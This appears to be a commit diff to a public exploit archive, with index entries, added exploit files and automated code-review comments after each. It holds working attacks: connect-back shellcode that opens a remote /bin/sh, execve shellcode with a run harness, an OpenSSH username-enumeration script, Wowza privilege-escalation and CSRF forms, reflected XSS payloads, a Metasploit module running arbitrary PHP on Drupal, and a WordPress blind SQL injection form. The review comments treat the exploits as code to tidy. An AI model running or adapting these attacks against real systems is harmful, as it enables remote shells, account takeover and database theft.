40128,platforms/lin_x86/shellcode/40128.c,"Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)",2016-07-20,bashis,lin_x86,shellcode,0
40129,platforms/python/webapps/40129.txt,"Django CMS 3.3.0 - (Editor Snippet) Persistent XSS",2016-07-20,Vulnerability-Lab,python,webapps,80
40130,platforms/php/remote/40130.rb,"Drupal RESTWS Module 7.x - Remote PHP Code Execution (Metasploit)",2016-07-20,"Mehmet Ince",php,remote,80
40131,platforms/lin_x86/shellcode/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,lin_x86,shellcode,0
40132,platforms/windows/local/40132.txt,"Wowza Streaming Engine 4.5.0 - Local Privilege Escalation",2016-07-20,LiquidWorm,windows,local,0
40133,platforms/multiple/webapps/40133.html,"Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation",2016-07-20,LiquidWorm,multiple,webapps,8088
40134,platforms/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Add Advanced Admin CSRF",2016-07-20,LiquidWorm,multiple,webapps,8088
40135,platforms/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple XSS",2016-07-20,LiquidWorm,multiple,webapps,8088
40136,platforms/linux/remote/40136.py,"OpenSSHD <= 7.2p2 - Username Enumeration",2016-07-20,0_o,linux,remote,22
40137,platforms/php/webapps/40137.html,"WordPress Video Player Plugin 1.5.16 - SQL Injection",2016-07-20,"David Vaartjes",php,webapps,80
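Review bot: entry 40128 is filed under `platforms/lin_x86/shellcode/40128.c` with platform `lin_x86`, although its title says it is Linux/CRISv32 shellcode for Axis devices, so the path and platform field do not match the target architecture and a search by platform would return it among x86 results. A platform directory for the actual architecture (or a comment on why `lin_x86` is used) would be clearer; 40131 on the following line is genuine x86 and is correctly placed.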


@ -0,0 +1,115 @@
/*
* Title: Axis Communication Linux/CRISv32 - Connect Back Shellcode
* Author: bashis <mcw noemail.eu> / 2016
*
*/
#include <stdio.h>
char sc[] =
//close(0)
"\x7a\x86" // clear.d r10
"\x5f\x9c\x06\x00" // movu.w 0x6,r9
"\x3d\xe9" // break 13
//close(1)
"\x41\xa2" // moveq 1,r10
"\x5f\x9c\x06\x00" // movu.w 0x6,r9
"\x3d\xe9" // break 13
//close(2)
"\x42\xa2" // moveq 2,r10
"\x5f\x9c\x06\x00" // movu.w 0x6,r9
"\x3d\xe9" // break 13
//
"\x10\xe1" // addoq 16,sp,acr
"\x42\x92" // moveq 2,r9
"\xdf\x9b" // move.w r9,[acr]
"\x10\xe1" // addoq 16,sp,acr
"\x02\xf2" // addq 2,acr
//PORT 443
"\x5f\x9e\x01\xbb" // move.w 0xbb01,r9
"\xdf\x9b" // move.w r9,[acr]
"\x10\xe1" // addoq 16,sp,acr
"\x6f\x96" // move.d acr,r9
"\x04\x92" // addq 4,r9
//IP 192.168.57.1
"\x6f\xfe\xc0\xa8\x39\x01" // move.d 139a8c0,acr
"\xe9\xfb" // move.d acr,[r9]
//
//socket()
"\x42\xa2" // moveq 2,r10
"\x41\xb2" // moveq 1,r11
"\x7c\x86" // clear.d r12
"\x6e\x96" // move.d $sp,$r9
"\xe9\xaf" // move.d $r10,[$r9+]
"\xe9\xbf" // move.d $r11,[$r9+]
"\xe9\xcf" // move.d $r12,[$r9+]
"\x41\xa2" // moveq 1,$r10
"\x6e\xb6" // move.d $sp,$r11
"\x5f\x9c\x66\x00" // movu.w 0x66,$r9
"\x3d\xe9" // break 13
//
"\x6a\x96" // move.d $r10,$r9
"\x0c\xe1" // addoq 12,$sp,$acr
"\xef\x9b" // move.d $r9,[$acr]
"\x0c\xe1" // addoq 12,$sp,$acr
"\x6e\x96" // move.d $sp,$r9
"\x10\x92" // addq 16,$r9
"\x6f\xaa" // move.d [$acr],$r10
"\x69\xb6" // move.d $r9,$r11
"\x50\xc2" // moveq 16,$r12
//
// connect()
"\x6e\x96" // move.d $sp,$r9
"\xe9\xaf" // move.d $r10,[$r9+]
"\xe9\xbf" // move.d $r11,[$r9+]
"\xe9\xcf" // move.d $r12,[$r9+]
"\x43\xa2" // moveq 3,$r10
"\x6e\xb6" // move.d $sp,$r11
"\x5f\x9c\x66\x00" // movu.w 0x66,$r9
"\x3d\xe9" // break 13
//
//dup(1)
"\x6f\xaa" // move.d [$acr],$r10
"\x41\xb2" // moveq 1,$r11
"\x5f\x9c\x3f\x00" // movu.w 0x3f,$r9
"\x3d\xe9" // break 13
//
//dup(2)
"\x6f\xaa" // move.d [$acr],$r10
"\x42\xb2" // moveq 2,$r11
"\x5f\x9c\x3f\x00" // movu.w 0x3f,$r9
"\x3d\xe9" // break 13
//execve("/bin/sh",NULL,NULL)
"\x90\xe2" // subq 16,$sp
"\x6e\x96" // move.d $sp,$r9
"\x6e\xa6" // move.d $sp,$10
"\x6f\x0e\x2f\x2f\x62\x69" // move.d 69622f2f,$r0
"\xe9\x0b" // move.d $r0,[$r9]
"\x04\x92" // addq 4,$r9
"\x6f\x0e\x6e\x2f\x73\x68" // move.d 68732f6e,$r0
"\xe9\x0b" // move.d $r0,[$r9]
"\x04\x92" // addq 4,$r9
"\x79\x8a" // clear.d [$r9]
"\x04\x92" // addq 4,$r9
"\x79\x8a" // clear.d [$r9]
"\x04\x92" // addq 4,$r9
"\xe9\xab" // move.d $r10,[$r9]
"\x04\x92" // addq 4,$r9
"\x79\x8a" // clear.d [$r9]
"\x10\xe2" // addq 16,$sp
"\x6e\xf6" // move.d $sp,$acr
"\x6e\x96" // move.d $sp,$r9
"\x6e\xb6" // move.d $sp,$r11
"\x7c\x86" // clear.d $r12
"\x4b\x92" // moveq 11,$r9
"\x3d\xe9"; // break 13
void
main(void)
{
void (*s)(void);
printf("sc size %d\n", sizeof(sc));
s = sc;
s();
}
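Review bot: `void main(void)` and `s = sc;` do not compile cleanly: `main` must return `int`, and assigning `char *` to `void (*)(void)` needs an explicit cast (`s = (void (*)(void))sc;`). `printf("sc size %d\n", sizeof(sc))` passes a `size_t` to `%d` (use `%zu`), and `sizeof` counts the terminating NUL of the string literal, so the printed size is one more than the shellcode's byte count. Because the bytes live in a writable data segment, the test harness only works where that segment is mapped executable; a header line stating the build command and that assumption would save readers a segfault. Minor: the comment on `"\x6e\xa6"` says `$10` where `$r10` is meant, and the `dup(1)` / `dup(2)` comments describe `dup2` (syscall 0x3f is invoked with two arguments in `$r10` and `$r11`).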


@ -0,0 +1,37 @@
/*
# Linux/x86 - execve /bin/sh shellcode (19 bytes)
# Author: sajith
# Tested on: i686 GNU/Linux
# Shellcode Length: 19
# SLAE - 750
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor eax,eax
8048062: 50 push eax
8048063: 68 2f 2f 73 68 push 0x68732f2f
8048068: 68 2f 62 69 6e push 0x6e69622f
804806d: 87 e3 xchg ebx,esp
804806f: b0 0b mov al,0xb
8048071: cd 80 int 0x80
===============poc by sajith shetty=========================
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
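Review bot: `main()` with an implicit return type is invalid in C99 and later, and `strlen(code)` is printed with `%d` although it returns `size_t` (`%zu`); the `\` after `unsigned char code[] =` is an unnecessary line continuation. Reporting the length with `strlen` only works because this particular byte string contains no NUL (it yields 19 here, matching the title); `sizeof(code) - 1` would be correct regardless of content. As with the other shellcode file in this commit, casting a data pointer to a function pointer only runs where the data segment is executable, which the header comment should state alongside the "Tested on" line.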

platforms/linux/remote/40136.py Executable file

@ -0,0 +1,157 @@
#!/usr/bin/python
#
# CVEs: CVE-2016-6210 (Credits for this go to Eddie Harari)
#
# Author: 0_o -- null_null
# nu11.nu11 [at] yahoo.com
# Oh, and it is n-u-one-one.n-u-one-one, no l's...
# Wonder how the guys at packet storm could get this wrong :(
#
# Date: 2016-07-19
#
# Purpose: User name enumeration against SSH daemons affected by CVE-2016-6210.
#
# Prerequisites: Network access to the SSH daemon.
#
# DISCLAIMER: Use against your own hosts only! Attacking stuff you are not
# permitted to may put you in big trouble!
#
# And now - the fun part :-)
#
import paramiko
import time
import numpy
import argparse
import sys
args = None
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def get_args():
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group()
parser.add_argument("host", type = str, help = "Give SSH server address like ip:port or just by ip")
group.add_argument("-u", "--user", type = str, help = "Give a single user name")
group.add_argument("-U", "--userlist", type = str, help = "Give a file containing a list of users")
parser.add_argument("-e", "--enumerated", action = "store_true", help = "Only show enumerated users")
parser.add_argument("-s", "--silent", action = "store_true", help = "Like -e, but just the user names will be written to stdout (no banner, no anything)")
parser.add_argument("--bytes", default = 50000, type = int, help = "Send so many BYTES to the SSH daemon as a password")
parser.add_argument("--samples", default = 12, type = int, help = "Collect so many SAMPLES to calculate a timing baseline for authenticating non-existing users")
parser.add_argument("--factor", default = 3.0, type = float, help = "Used to compute the upper timing boundary for user enumeration")
parser.add_argument("--trials", default = 1, type = int, help = "try to authenticate user X for TRIALS times and compare the mean of auth timings against the timing boundary")
args = parser.parse_args()
return args
def get_banner(host, port):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname = host, port = port, username = 'invalidinvalidinvalid', password = 'invalidinvalidinvalid')
except:
banner = ssh.get_transport().remote_version
ssh.close()
return banner
def connect(host, port, user):
global args
starttime = 0.0
endtime = 0.0
p = 'B' * int(args.bytes)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
starttime=time.clock()
try:
ssh.connect(hostname = host, port = port, username = user, password = p, look_for_keys = False, gss_auth = False, gss_kex = False, gss_deleg_creds = False, gss_host = None, allow_agent = False)
except:
endtime=time.clock()
finally:
ssh.close()
return endtime - starttime
def main():
global args
args = get_args()
if not args.silent: print("\n\nUser name enumeration against SSH daemons affected by CVE-2016-6210")
if not args.silent: print("Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari\n\n")
if args.host:
host = args.host.split(":")[0]
try:
port = int(args.host.split(":")[1])
except IndexError:
port = 22
users = []
if args.user:
users.append(args.user)
elif args.userlist:
with open(args.userlist, "r") as f:
users = f.readlines()
else:
if not args.silent: print(bcolors.FAIL + "[!] " + bcolors.ENDC + "You must give a user or a list of users")
sys.exit()
if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing SSHD at: " + bcolors.BOLD + str(host) + ":" + str(port) + bcolors.ENDC + ", Banner: " + bcolors.BOLD + get_banner(host, port) + bcolors.ENDC)
# get baseline timing for non-existing users...
baseline_samples = []
baseline_mean = 0.0
baseline_deviation = 0.0
if not args.silent: sys.stdout.write(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Getting baseline timing for authenticating non-existing users")
for i in range(1, int(args.samples) + 1):
if not args.silent: sys.stdout.write('.')
if not args.silent: sys.stdout.flush()
sample = connect(host, port, 'foobar-bleh-nonsense' + str(i))
baseline_samples.append(sample)
if not args.silent: sys.stdout.write('\n')
# remove the biggest and smallest value
baseline_samples.sort()
baseline_samples.pop()
baseline_samples.reverse()
baseline_samples.pop()
# do math
baseline_mean = numpy.mean(numpy.array(baseline_samples))
baseline_deviation = numpy.std(numpy.array(baseline_samples))
if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline mean for host " + host + " is " + str(baseline_mean) + " seconds.")
if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline variation for host " + host + " is " + str(baseline_deviation) + " seconds.")
upper = baseline_mean + float(args.factor) * baseline_deviation
if not args.silent: print(bcolors.WARNING + "[*] " + bcolors.ENDC + "Defining timing of x < " + str(upper) + " as non-existing user.")
if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing your users...")
#
# Get timing for the given user name...
#
for u in users:
user = u.strip()
enum_samples = []
enum_mean = 0.0
for t in range(0, int(args.trials)):
timeval = connect(host, port, user)
enum_samples.append(timeval)
enum_mean = numpy.mean(numpy.array(enum_samples))
if (enum_mean < upper):
if not (args.enumerated or args.silent) :
print(bcolors.FAIL + "[-] " + bcolors.ENDC + user + " - timing: " + str(enum_mean))
else:
if not args.silent:
print(bcolors.OKGREEN + "[+] " + bcolors.ENDC + user + " - timing: " + str(enum_mean))
else:
print(user)
if __name__ == "__main__":
main()
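Review bot: in `get_banner()` the variable `banner` is assigned only inside the bare `except:`, so if `connect()` ever succeeds the function ends with `NameError`, and if the TCP connection fails `ssh.get_transport()` returns `None` and the handler itself raises `AttributeError`; read `remote_version` outside the handler and catch `paramiko.SSHException` and `socket.error` explicitly so a failed connection is reported rather than masked. Likewise the two `baseline_samples.pop()` calls raise `IndexError` when `--samples` is below 2, so that argument should be validated in `get_args()`.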


@ -0,0 +1,60 @@
<!--
Wowza Streaming Engine 4.5.0 Remote Privilege Escalation Exploit
Vendor: Wowza Media Systems, LLC.
Product web page: https://www.wowza.com
Affected version: 4.5.0 (build 18676)
Platform: JSP
Summary: Wowza Streaming Engine is robust, customizable, and scalable
server software that powers reliable video and audio streaming to any
device. Learn the benefits of using Wowza Streaming Engine to deliver
high-quality live and on-demand video content to any device.
Desc: The application suffers from a privilege escalation issue. Normal
user (read-only) can elevate his/her privileges by sending a POST request
seting the parameter 'accessLevel' to 'admin' gaining admin rights and/or
setting the parameter 'advUser' to 'true' and '_advUser' to 'on' gaining
advanced admin rights.
Advanced Admin:
Allow access to advanced properties and features
Only for expert Wowza Streaming Engine users.
Tested on: Winstone Servlet Engine v1.0.5
Servlet/2.5 (Winstone/1.0.5)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5340
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5340.php
03.07.2016
--
Privilege escalation from existing read-only user to admin(advanced):
-->
<html>
<body>
<form action="http://localhost:8088/enginemanager/server/user/edit.htm" method="POST">
<input type="hidden" name="version" value="0" />
<input type="hidden" name="action" value="quickEdit" />
<input type="hidden" name="userName" value="usermuser" />
<input type="hidden" name="userPassword" value="" />
<input type="hidden" name="userPassword2" value="" />
<input type="hidden" name="accessLevel" value="admin" />
<input type="hidden" name="advUser" value="true" />
<input type="hidden" name="&#95;advUser" value="on" />
<input type="hidden" name="ignoreWarnings" value="false" />
<input type="submit" value="God mode" />
</form>
</body>
</html>
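Review bot: the root cause described in the Desc paragraph (`edit.htm` honours client-supplied `accessLevel`, `advUser` and `_advUser` for a read-only caller) is a missing server-side authorization check on those fields, and the header should say so and state whether a fixed build exists, since it lists only the affected build 18676 with no remediation. The form also hard-codes `userName=usermuser` and `localhost:8088` without marking them as placeholders for the tester's own account and host, and `seting` in the Desc line is a typo.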


@ -0,0 +1,52 @@
<!--
Wowza Streaming Engine 4.5.0 CSRF Add Advanced Admin Exploit
Vendor: Wowza Media Systems, LLC.
Product web page: https://www.wowza.com
Affected version: 4.5.0 (build 18676)
Platform: JSP
Summary: Wowza Streaming Engine is robust, customizable, and scalable
server software that powers reliable video and audio streaming to any
device. Learn the benefits of using Wowza Streaming Engine to deliver
high-quality live and on-demand video content to any device.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: Winstone Servlet Engine v1.0.5
Servlet/2.5 (Winstone/1.0.5)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5341
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5341.php
03.07.2016
--
-->
<html>
<body>
<form action="http://localhost:8088/enginemanager/server/user/edit.htm" method="POST">
<input type="hidden" name="version" value="0" />
<input type="hidden" name="action" value="new" />
<input type="hidden" name="userName" value="thricer" />
<input type="hidden" name="userPassword" value="123123" />
<input type="hidden" name="userPassword2" value="123123" />
<input type="hidden" name="accessLevel" value="admin" />
<input type="hidden" name="advUser" value="true" />
<input type="hidden" name="&#95;advUser" value="on" />
<input type="hidden" name="ignoreWarnings" value="false" />
<input type="submit" value="Execute" />
</form>
</body>
</html>
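Review bot: the `new` action request carries no anti-CSRF token and the Desc paragraph only says "validity checks" without naming the missing one; the header should spell out the fix (a per-session token validated on `edit.htm`, rejection of cross-origin POSTs via `Origin`/`Referer` checks, and `SameSite` session cookies). The header is otherwise identical to ZSL-2016-5340 apart from ID and description, and the `--` separator before `-->` introduces nothing here, so either drop it or describe the PoC form below it as 5340 does.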


@ -0,0 +1,117 @@

Wowza Streaming Engine 4.5.0 Multiple Cross-Site Scripting Vulnerabilities
Vendor: Wowza Media Systems, LLC.
Product web page: https://www.wowza.com
Affected version: 4.5.0 (build 18676)
Platform: JSP
Summary: Wowza Streaming Engine is robust, customizable, and scalable
server software that powers reliable video and audio streaming to any
device. Learn the benefits of using Wowza Streaming Engine to deliver
high-quality live and on-demand video content to any device.
Desc: Wowza Streaming Engine suffers from multiple reflected cross-site
scripting vulnerabilities when input passed via several parameters to
several scripts is not properly sanitized before being returned to the
user. This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.
Tested on: Winstone Servlet Engine v1.0.5
Servlet/2.5 (Winstone/1.0.5)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5343
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php
03.07.2016
--
http://localhost:8088/enginemanager/applications/live/main/view.htm?vhost=_defaultVHost_&appName=live<script>alert(1)</script>
http://localhost:8088/enginemanager/applications/monitoring/historical.jsdata?vhost=_defaultVHost_&appName=test&periodStart=2016-07-03T13%3A42%3A32%2B02%3A00&periodEnd=2016-07-03T14%3a42%3a32%2b02%3a00<script>alert(2)</script>
http://localhost:8088/enginemanager/applications/monitoring/historical.jsdata?vhost=_defaultVHost_&appName=test&periodStart=2016-07-03T13%3a42%3a32%2b02%3a00<script>alert(3)</script>&periodEnd=2016-07-03T14%3A42%3A32%2B02%3A00
http://localhost:8088/enginemanager/applications/liveedge/securityplayback/edit.htm?appName=test<script>alert(4)</script>&vhost=_defaultVHost_
---
POST /enginemanager/applications/liveedge/main/edit.htm
Host: localhost:8088
vhost=_defaultVHost_";alert(5)//&uiAppName=test&uiAppType=Live%20Edge%20Application<script>alert(6)</script>&section=main&version=1467548313123&action=new&description=desctest&mpegDash=true&_mpegDash=on&appleHLS=true&_appleHLS=on&adobeRTMP=true&_adobeRTMP=on&adobeHDS=true&_adobeHDS=on&msSmooth=true
---
POST /enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm
Host: localhost:8088
vhost=_defaultVHost_&uiAppName=test";alert(7)//&uiAppType=Live+Edge+Application&instanceName=";alert(8)//&section=publishers_panasonic_camcorder";alert(9)//&version=0&driverName=Panasonic&publishersStreamFileName=panasonicstreamname&cameraIpAddress=1.1.1.1&appType=liveedge";alert(10)//&appName=test
---
POST /enginemanager/applications/liveedge/securityplayback/edit.htm HTTP/1.1
Host: localhost:8088
vhost=_defaultVHost_";alert(11)//&uiAppName=test&uiAppType=Live%20Edge%20Application<script>alert(12)</script>&section=securityplayback&version=1467549110876&_requireSecureRTMPConnection=on&secureTokenState=Protect+all+protocols+using+hash+(SecureToken+version+2)&sharedSecret=sharedtestsecret&hashAlgorithm=SHA
---
POST /enginemanager/applications/liveedge/streamtarget/add.htm HTTP/1.1
Host: localhost:8088
enabled=true&protocol=RTMP&destinationName=akamai&destApplicationRequired=false&destAppInstanceRequired=false&usernameRequired=true&passwordRequired=true&wowzaCloudDestinationType=1*/alert(13)//&facebookAccessToken=&facebookDestName=&facebookDestId=&facebookEventSourceName=&wowzaDotComFacebookUrl=https%3A%2F%2Ffb.wowza.com%2Fwsem%2Fstream_targets%2Fv1&connectionCode=&protocolShoutcast=Shoutcast
---
-------------------------------------------------------------------------------------------------------------------
| Script | Parameter |
-------------------------------------------------------------------------------------------------------------------
| |
/enginemanager/applications/live/main/view.htm | appName |
/enginemanager/applications/liveedge/main/edit.htm | uiAppType |
/enginemanager/applications/liveedge/main/edit.htm | vhost |
/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm | appType |
/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm | instanceName |
/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm | section |
/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm | uiAppType |
/enginemanager/applications/liveedge/securityplayback/edit.htm | appName |
/enginemanager/applications/liveedge/securityplayback/edit.htm | uiAppType |
/enginemanager/applications/liveedge/securityplayback/edit.htm | vhost |
/enginemanager/applications/liveedge/streamtarget/add.htm | wowzaCloudDestinationType |
/enginemanager/applications/liveedge/streamtarget/wizard.htm | appName |
/enginemanager/applications/liveedge/streamtarget/wizard.htm | vhost |
/enginemanager/applications/monitoring/historical.jsdata | periodEnd |
/enginemanager/applications/monitoring/historical.jsdata | periodStart |
/enginemanager/applications/new.htm | uiAppName |
/enginemanager/server/mediacachesource/edit.htm | action |
/enginemanager/server/mediacachesource/edit.htm | maxTTLDays |
/enginemanager/server/mediacachesource/edit.htm | maxTTLHours |
/enginemanager/server/mediacachesource/edit.htm | maxTTLMinutes |
/enginemanager/server/mediacachesource/edit.htm | maxTTLSeconds |
/enginemanager/server/mediacachesource/edit.htm | minTTLDays |
/enginemanager/server/mediacachesource/edit.htm | minTTLHours |
/enginemanager/server/mediacachesource/edit.htm | minTTLMinutes |
/enginemanager/server/mediacachesource/edit.htm | minTTLSeconds |
/enginemanager/server/mediacachestore/edit.htm | action |
/enginemanager/server/transcoderencode/edit.htm | action |
/enginemanager/server/transcoderencode/edit.htm | appType |
/enginemanager/server/transcoderencode/edit.htm | templateName |
/enginemanager/server/vhost/streamfile/new.htm | streamName |
/enginemanager/transcoder/new.htm | appType |
/enginemanager/transcoder/new.htm | dstTemplate |
/enginemanager/applications/monitoring/app.jsdata | appName |
/enginemanager/applications/monitoring/historical.jsdata | appName |
/enginemanager/applications/monitoring/historical.jsdata | vhost |
/enginemanager/server/logs/getlog.jsdata | filter |
/enginemanager/server/logs/getlog.jsdata | logMode |
/enginemanager/server/logs/getlog.jsdata | logName |
/enginemanager/server/logs/getlog.jsdata | logType |
| |
---------------------------------------------------------------------------------|--------------------------------|
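Review bot: the parameter table lists endpoints and parameters (`streamtarget/wizard.htm`, `applications/new.htm`, `mediacachesource/edit.htm`, `mediacachestore/edit.htm`, `transcoderencode/edit.htm`, `vhost/streamfile/new.htm`, `transcoder/new.htm`, `monitoring/app.jsdata`, `logs/getlog.jsdata`) for which the PoC section shows no request, and the table is misaligned (the `Script` header does not sit over its column and the closing rule has a stray `|`); either add the missing requests or state that the table is the full set and the requests are a sample. Worth stating for whoever remediates: the payloads land in three different contexts (`<script>` in HTML body, `";alert(n)//` inside a JavaScript string, `*/alert(13)//` inside a JavaScript comment), so the fix is context-aware output encoding on each page, not a single HTML-escape pass; the two POST requests without `HTTP/1.1` and the missing `Content-Type` headers should also be completed for reproducibility.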

platforms/php/remote/40130.rb Executable file

@ -0,0 +1,86 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Drupal RESTWS Module 7.x Remote PHP Code Execution',
'Description' => %q{
This module exploits the Drupal RESTWS module vulnerability.
RESTWS alters the default page callbacks for entities to provide
additional functionality. A vulnerability in this approach allows
an unauthenticated attacker to send specially crafted requests resulting
in arbitrary PHP execution
This module was tested against RESTWS 7.x with Drupal 7.5
installation on Ubuntu server.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Devin Zuczek', # discovery
'Mehmet Ince <mehmet@mehmetince.net>' # msf module
],
'References' =>
[
['URL', 'https://www.drupal.org/node/2765567'],
['URL',
'https://www.mehmetince.net/exploit/drupal-restws-module-7x-remote-php-code-execution']
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => 'Jul 13 2016',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [ true, "The target URI of the
Drupal installation", '/'])
], self.class
)
end
def check
r = rand_text_alpha(8 + rand(4))
url = normalize_uri(target_uri.path, "?q=taxonomy_vocabulary/", r
, "/passthru/echo%20#{r}")
res = send_request_cgi(
'method' => 'GET',
'uri' => url
)
if res && res.body =~ /#{r}/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
random = rand_text_alpha(1 + rand(2))
url = normalize_uri(target_uri.path,
"?q=taxonomy_vocabulary/",
random ,
"/passthru/",
Rex::Text.uri_encode("php -r
'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'")
)
send_request_cgi(
'method' => 'GET',
'uri' => url
)
end
end
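Review bot: three string literals are broken across lines in a way that changes their value if committed as shown: the `OptString` description in `register_options`, the `normalize_uri(... r` / `, "/passthru/echo%20#{r}")` argument list in `check`, and the `php -r` / `'eval(...)'` command in `exploit`, where the embedded newline would end up inside the URI-encoded command; confirm this is extraction wrapping and not the file contents. The `Description` is also missing a full stop after "arbitrary PHP execution", and "Drupal 7.5" should be checked against the release actually tested.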

platforms/php/webapps/40137.html Executable file

@ -0,0 +1,116 @@
<!--
Multiple SQL injection vulnerabilities in WordPress Video Player
Abstract
It was discovered that WordPress Video Player is affected by multiple blind SQL injection vulnerabilities. Using these issues it is possible for a logged on Contributor (or higher) to extract arbitrary data (eg, the Administrator's password hash) from the WordPress database.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160712-0004
Tested versions
This issue was successfully tested on WordPress Video Player WordPress plugin version 1.5.16.
Fix
This issue is resolved in WordPress Video Player 1.5.18.
Introduction
WordPress Video Player is a WordPress video plugin that allows you to easily add videos to your website. WordPress Video Player is affected by multiple blind SQL injection vulnerabilities. Using these issues it is possible for a logged on Contributor (or higher) to extract arbitrary data (eg, the Administrator's password hash) from the WordPress database.
Details
The vulnerabilities exist in the functions show_tag(), spider_video_select_playlist(), and spider_video_select_video(). The author tried to prevent SQL injection by calling the esc_sql() WordPress function. However, the user input is used in the ORDER BY clause and is consequently not quoted. Due to this it is possible to inject arbitrary SQL statements despite the use of esc_sql()
show_tag():
[...]
if (isset($_POST['page_number'])) {
if ($_POST['asc_or_desc']) {
$sort["sortid_by"] = esc_sql(esc_html(stripslashes($_POST['order_by'])));
if ($_POST['asc_or_desc'] == 1) {
$sort["custom_style"] = "manage-column column-title sorted asc";
$sort["1_or_2"] = "2";
$order = "ORDER BY " . $sort["sortid_by"] . " ASC";
} else {
$sort["custom_style"] = "manage-column column-title sorted desc";
$sort["1_or_2"] = "1";
$order = "ORDER BY " . $sort["sortid_by"] . " DESC";
}
}
spider_video_select_playlist():
[...]
if(isset($_POST['page_number']))
{
if($_POST['asc_or_desc'])
{
$sort["sortid_by"]=esc_sql(esc_html(stripslashes($_POST['order_by'])));
if($_POST['asc_or_desc']==1)
{
$sort["custom_style"]="manage-column column-title sorted asc";
$sort["1_or_2"]="2";
$order="ORDER BY ".$sort["sortid_by"]." ASC";
}
else
{
$sort["custom_style"]="manage-column column-title sorted desc";
$sort["1_or_2"]="1";
$order="ORDER BY ".$sort["sortid_by"]." DESC";
}
}
function spider_video_select_video():
[...]
if(isset($_POST['page_number']))
{
if($_POST['asc_or_desc'])
{
$sort["sortid_by"]=esc_html(stripslashes($_POST['order_by']));
if($_POST['asc_or_desc']==1)
{
$sort["custom_style"]="manage-column column-title sorted asc";
$sort["1_or_2"]="2";
$order="ORDER BY ".esc_sql($sort["sortid_by"])." ASC";
}
else
{
$sort["custom_style"]="manage-column column-title sorted desc";
$sort["1_or_2"]="1";
$order="ORDER BY ".esc_sql($sort["sortid_by"])." DESC";
}
}
Proof of concept
-->
<html>
<body>
<form action="http://<target>/wp-admin/admin-ajax.php?action=spiderVeideoPlayerselectplaylist" method="POST">
<input type="hidden" name="search_events_by_title" value="" />
<input type="hidden" name="page_number" value="0" />
<input type="hidden" name="serch_or_not" value="" />
<input type="hidden" name="asc_or_desc" value="1" />
<input type="hidden" name="order_by" value="(CASE WHEN (SELECT sleep(10)) = 1 THEN id ELSE title END) ASC #" />
<input type="hidden" name="option" value="com_Spider_Video_Player" />
<input type="hidden" name="task" value="select_playlist" />
<input type="hidden" name="boxchecked" value="0" />
<input type="hidden" name="filter_order_playlist" value="" />
<input type="hidden" name="filter_order_Dir_playlist" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
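Review bot: the Details paragraph correctly explains why `esc_sql()` does not help (the value is concatenated unquoted into `ORDER BY`, an identifier position that escaping cannot protect), but the advisory should state the corresponding fix so readers can verify 1.5.18: `order_by` must be validated against an allowlist of column names and `asc_or_desc` reduced to a literal `ASC`/`DESC` before either reaches the query. Minor: the Details sentence ends without a full stop, and the third snippet is labelled `function spider_video_select_video():` while the other two omit `function`.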


